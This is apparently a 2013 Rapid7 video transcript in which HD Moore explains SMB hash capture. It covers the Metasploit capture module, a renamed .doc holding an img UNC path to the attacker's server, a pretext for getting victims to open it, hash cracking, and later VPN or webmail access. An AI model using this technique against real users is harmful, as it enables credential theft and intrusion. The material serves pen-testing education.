EZ Mode Hacking with Metasploit

February 27, 2013

In this week's Whiteboard Wednesday, Rapid7 CSO HD Moore walks us through a simple pen testing trick that doesn't require use of exploits. This technique can be a useful tool in a social engineering campaign to measure users' security awareness.

Video Transcript

Hi, My name is H. D. Moore. I'm the CSO of Rapid7 and the founder of the Metasploit Project. In this Whiteboard Wednesday, I want to cover what I call EZ Mode, which is a fun pen testing trick that doesn't require any exploits or really much of anything else but the Metasploit framework and a little bit of time.

Show more Show less

So, in this example, I want to cover something that's called SMB hash capture. It doesn't really have a good name for it, but it's a technique I use quite a bit during pen testing.

First thing you want to do is install Metasploit on a server connected to the Internet. So in this case, we've got our evil hacker with the awesome mohawk here, and he's got his laptop set up. He's shoveling to a server online. He's got Metasploit framework running. He's got the console open, and he does use auxiliary/server/capture/smb.

What this module will do is create a fake SMB listener, wait for a connection from a client, tell it that it can't log in, wait for it to try to log in, capture the password and tell it to go away. In that case, you don't get the clear text password. You get a password encrypted with the network challenge key. Sorry, you get the password that's initially encrypted using [inaudible 0:59], encrypted again to the challenge key. That form of password, even though you can't really do much with it as it is, you can crack it and hopefully obtain the clear text password.

So the first thing we're going to do is, after we've got Metasploit up and running, we're going to create an HTML file. Just on your desktop, open up Notepad exe. Enter in <img src= the ip address of the server using to connect the attack, followed by \ a sharename. It can be anything random here. It doesn't matter. Followed by anything that ends in jpeg or png or another common image format.

What you're going to do then is save that HTML file as a .doc or a .docx file. That causes the attachment to open up in Word, which then gets rendered by Internet Explorer as an HTML when it figures out that it's not really a Word document. So a cool trick that lets you basically, even if the user's using Firefox or Chrome as a normal browser, this forces the Internet Explorer rendering engine to be called, which in turn will process this UNC URL path, causing it to connect back to our evil machine and get the password for the user running, opening the document.

So in the case, we create the document, create the HTML file, rename it as a doc file. We send it to our target user here, who has a very nice purple tie. They say, "Oh, look, a random Word doc I have," and they open it up. So they open it up, and there's nothing malicious in it. Antivirus won't catch it. There's nothing really bad about this, besides it having an image link in it.

Nothing really happens. It kind of freezes for a second, times out. Say, "Okay, that was weird," whatever, close it.

To be more effective, you can actually take a document the user has written, embed the image link into that document and save it as HTML. Rename it back to .doc again and send it back to them, saying, "Hey, I think you've got a typo on this line." That usually convinces them, "Hey, I need to go look at this thing and figure it out."

This is really good in marketing departments. You can destroy marketing departments with this email process.

So once the user opens up that doc, what's going to happen is their Windows PC is going to connect back to the server running Metasploit. It's going to try to log in as a user name. It's first going to try to log in as a null account or a guest account. It's going to say, "No, no. You can't login in guest. Log in for real." Your Windows PC will then automatically log in with your user name and password in the encrypted format to the server.

At this point, the attacker has the encrypted form of the password. Now the really cool thing about that is if they can crack the password, either using like a rainbow table with something like the half lm tables, which are good for this kind of attack, or using something like John the Ripper, they can then use that clear text password to log back into the company from the outside, either using something like the VPN, if you've got VPN access through credentials, or even just logging in Alec Web Access. Sometimes that's what I've done before. I've used this to get access to Alec Web Access, use that to download their email spool, found other passwords. Use that to conduct phishing attacks inside the company at that point, as that user. So they're much more trustworthy because they're coming from that particular user at that point.

And that's really it. So that's it for this week. Thank you and see you next week.